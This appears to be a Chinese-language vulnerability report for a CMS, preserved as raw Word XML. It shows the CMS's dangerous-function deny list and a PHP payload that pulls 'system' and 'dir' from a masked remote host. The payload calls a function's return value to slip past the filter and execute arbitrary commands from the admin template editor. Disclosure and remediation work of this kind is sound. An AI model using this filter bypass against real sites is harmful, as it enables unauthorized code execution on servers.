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3D671" w14:textId="786D798F" w:rsidR="0076292C" w:rsidRDefault="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次漏洞产生因该</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00530C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对代码缺少有效过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A409A" w14:textId="5B04A213" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞产生位置为后台模板模块，标签源码管理功能页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073527CA" w14:textId="050FFA3B" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="240A8BB8" wp14:editId="01F7A1E8">
            <wp:extent cx="5263515" cy="3540125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1199907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375A4" w14:textId="59E000A0" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞产生原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC0B672" w14:textId="4D011098" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关源码如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517BE482" w14:textId="68CB7023" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00530C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>‘’’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CBFED2" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:r>
        <w:t xml:space="preserve">$content = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preg_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("#(/\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>*)[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>\s\S]*(\*/)#i", '', $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFBC876" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A"/>
    <w:p w14:paraId="7846083E" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:r>
        <w:t>global $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cfg_disable_funs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B72743" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cfg_disable_funs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cfg_disable_funs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>) ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cfg_disable_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>funs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A0F2D" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cfg_disable_funs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = $cfg_disable_funs.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>',[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC437A" w14:textId="6FD98A6F" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:r>
        <w:t>‘’’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6B2BE" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A"/>
    <w:p w14:paraId="390B758E" w14:textId="759715A0" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数和函数返回值后加括号的形式进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92E3B3" w14:textId="77777777" w:rsidR="00F3243A" w:rsidRDefault="00F3243A" w:rsidP="00F3243A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49490096" w14:textId="20CB2C91" w:rsidR="00530C9A" w:rsidRDefault="00F3243A" w:rsidP="00530C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74659278" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77B0EFFD" w14:textId="6F9418DE" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00530C9A"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r>
        <w:t>.xx.xx.xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /1.txt'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3BA6A" w14:textId="206F9132" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t>$b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:t>.xx.xx.xx/2.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764357EF" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t xml:space="preserve"> function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10916D74" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t xml:space="preserve">     return $a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620B7E9" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C2509" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>b)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFE677" w14:textId="3E65975F" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266651E" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A"/>
    <w:p w14:paraId="08C191BE" w14:textId="7D31DA65" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00530C9A"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r>
        <w:t>.xx.xx.xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812BCF4" w14:textId="03362881" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00530C9A">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C70DC5D" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A"/>
    <w:p w14:paraId="6D421DAD" w14:textId="76AD90C4" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00530C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:t>.xx.xx.xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /2.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5307E" w14:textId="030BF329" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r w:rsidRPr="00530C9A">
        <w:t>system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF7F1C7" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A"/>
    <w:p w14:paraId="50BF7587" w14:textId="77777777" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A"/>
    <w:p w14:paraId="680765FB" w14:textId="499F1330" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过访问对应的网页可以执行任意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A6D9B8" w14:textId="3C3B55B9" w:rsidR="00530C9A" w:rsidRDefault="00530C9A" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17EAD932" wp14:editId="2D798773">
            <wp:extent cx="5271135" cy="3564890"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="2751032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F4888" w14:textId="77777777" w:rsidR="00C271F5" w:rsidRDefault="00C271F5" w:rsidP="00530C9A"/>
    <w:p w14:paraId="0360B833" w14:textId="77777777" w:rsidR="00C271F5" w:rsidRDefault="00C271F5" w:rsidP="00530C9A"/>
    <w:p w14:paraId="4C385452" w14:textId="3D6979F0" w:rsidR="00C271F5" w:rsidRDefault="00C271F5" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F488A" w14:textId="004F263F" w:rsidR="00C271F5" w:rsidRPr="00530C9A" w:rsidRDefault="00C271F5" w:rsidP="00530C9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用相关函数</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C271F5" w:rsidRPr="00530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AC"/>
    <w:rsid w:val="000677AC"/>
    <w:rsid w:val="00530C9A"/>
    <w:rsid w:val="0076292C"/>
    <w:rsid w:val="00C271F5"/>
    <w:rsid w:val="00F3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17FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CC62733F-CEF4-40ED-8738-C71815AB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晞铭 王</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>晞铭 王</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-22T13:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-22T13:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>